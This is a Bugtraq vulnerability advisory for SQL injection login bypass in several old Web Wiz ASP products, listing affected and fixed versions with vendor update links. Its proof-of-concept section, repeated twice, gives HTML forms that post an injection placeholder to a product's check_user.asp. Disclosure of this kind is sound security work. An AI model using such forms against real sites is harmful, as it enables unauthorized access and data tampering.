Web Wiz Multiple Products SQL Injection Vulnerability
BID:16085
Info
Web Wiz Multiple Products SQL Injection Vulnerability
| Bugtraq ID: | 16085 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 30 2005 12:00AM |
| Updated: | Dec 30 2005 12:00AM |
| Credit: | Discovered by DevilBox of KAPDA. |
| Vulnerable: |
Webwiz Site News Access 97 3.0 6 Webwiz Site News Access 2000 3.0 6 Webwiz Polls Access 97 3.0 6 Webwiz Polls Access 2000 3.0 6 Webwiz Journal Access 97 1.0 Webwiz Journal Access 2000 1.0 Webwiz Database Login Access 97 1.71 Webwiz Database Login Access 2000 1.71 |
| Not Vulnerable: |
Webwiz Site News Access 97 3.0 7 Webwiz Site News Access 2000 3.0 7 Webwiz Polls Access 97 3.0 7 Webwiz Polls Access 2000 3.0 7 Webwiz Journal Access 97 1.0 1 Webwiz Journal Access 2000 1.0 1 Webwiz Database Login Access 2000 1.72 |
Discussion
Web Wiz Multiple Products SQL Injection Vulnerability
Multiple Products by Web Wiz are prone to an SQL injection vulnerability.
Successful exploitation can allow an attacker to bypass authentication and gain unauthorized access to a site.
Attacks may also result in disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Web Wiz Site News 3.06 for Access 2000 and Access 97, Web Wiz Journal 1.0 for Access 2000 and Access 97, Web Wiz Polls 3.06 for Access 2000 and Access 97, Web Wiz Database Login 1.71 for Access 2000 and Access 97 are vulnerable to this issue. Prior versions are reportedly affected as well.
Multiple Products by Web Wiz are prone to an SQL injection vulnerability.
Successful exploitation can allow an attacker to bypass authentication and gain unauthorized access to a site.
Attacks may also result in disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Web Wiz Site News 3.06 for Access 2000 and Access 97, Web Wiz Journal 1.0 for Access 2000 and Access 97, Web Wiz Polls 3.06 for Access 2000 and Access 97, Web Wiz Database Login 1.71 for Access 2000 and Access 97 are vulnerable to this issue. Prior versions are reportedly affected as well.
Exploit / POC
Web Wiz Multiple Products SQL Injection Vulnerability
An exploit is not required.
The following proof of concept example is available:
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
An exploit is not required.
The following proof of concept example is available:
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
Solution / Fix
Web Wiz Multiple Products SQL Injection Vulnerability
Solution:
The vendor has released updated versions to address these issues.
Webwiz Journal Access 97 1.0
Webwiz Journal Access 2000 1.0
Webwiz Database Login Access 2000 1.71
Webwiz Site News Access 97 3.0 6
Webwiz Polls Access 2000 3.0 6
Webwiz Polls Access 97 3.0 6
Webwiz Site News Access 2000 3.0 6
Solution:
The vendor has released updated versions to address these issues.
Webwiz Journal Access 97 1.0
-
Web Wiz Web Wiz Journal 1.01 Access 97
http://webwizguide.info/asp/sample_scripts/software_license.asp?ID=56& mode=aspApp
Webwiz Journal Access 2000 1.0
-
Web Wiz Web Wiz Journal 1.01 Access 2000
http://webwizguide.info/asp/sample_scripts/software_license.asp?ID=55& mode=aspApp
Webwiz Database Login Access 2000 1.71
-
Web Wiz Web Wiz Database Login 1.72 Access 2000
http://webwizguide.info/asp/sample_scripts/software_license.asp?ID=51& mode=aspApp
Webwiz Site News Access 97 3.0 6
-
Web Wiz Web Wiz Site News 3.07 Access 97
http://webwizguide.info/asp/sample_scripts/software_license.asp?ID=28& mode=aspApp
Webwiz Polls Access 2000 3.0 6
-
Web Wiz Web Wiz Polls 3.07 Access 2000
http://webwizguide.info/asp/sample_scripts/software_license.asp?ID=39& mode=aspApp
Webwiz Polls Access 97 3.0 6
-
Web Wiz Web Wiz Polls 3.07 Access 97
http://webwizguide.info/asp/sample_scripts/software_license.asp?ID=41& mode=aspApp
Webwiz Site News Access 2000 3.0 6
-
Web Wiz Web Wiz Site News 3.07 Access 2000
http://webwizguide.info/asp/sample_scripts/software_license.asp?ID=27& mode=aspApp
References
Web Wiz Multiple Products SQL Injection Vulnerability
References:
References: